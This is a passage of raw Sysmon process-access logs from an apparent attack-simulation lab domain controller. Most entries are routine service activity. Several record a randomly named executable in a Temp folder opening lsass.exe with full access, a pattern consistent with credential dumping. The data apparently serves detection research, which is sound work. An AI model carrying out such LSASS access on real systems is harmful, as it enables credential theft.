AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005250Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005249Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe47400x00000161B50D082C-- 10341000x80000000000000005248Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005247Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-1201-000000008801}3876C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005246Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C62-5FA1-0A00-000000008801}852944C:\Windows\system32\services.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005245Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7CDA-5FA1-1001-000000008801}8843148C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-1101-000000008801}4676C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005244Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005243Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005242Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005241Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005240Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005239Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005238Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005237Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005236Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005235Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-1101-000000008801}4676C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005234Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7CDA-5FA1-0F01-000000008801}50044152C:\Windows\system32\cmd.exe{D28789B6-7CDA-5FA1-1101-000000008801}4676C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005233Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.970{D28789B6-7CDA-5FA1-1101-000000008801}4676C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{D28789B6-7CDA-5FA1-0F01-000000008801}5004C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 824800x80000000000000005232Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe50720x00000161B50D082C-- 10341000x80000000000000005231Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.965{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005230Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7CDA-5FA1-1001-000000008801}8843148C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0F01-000000008801}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005229Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-1001-000000008801}884C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005228Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005227Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005226Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005225Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005224Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005223Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005222Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005221Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 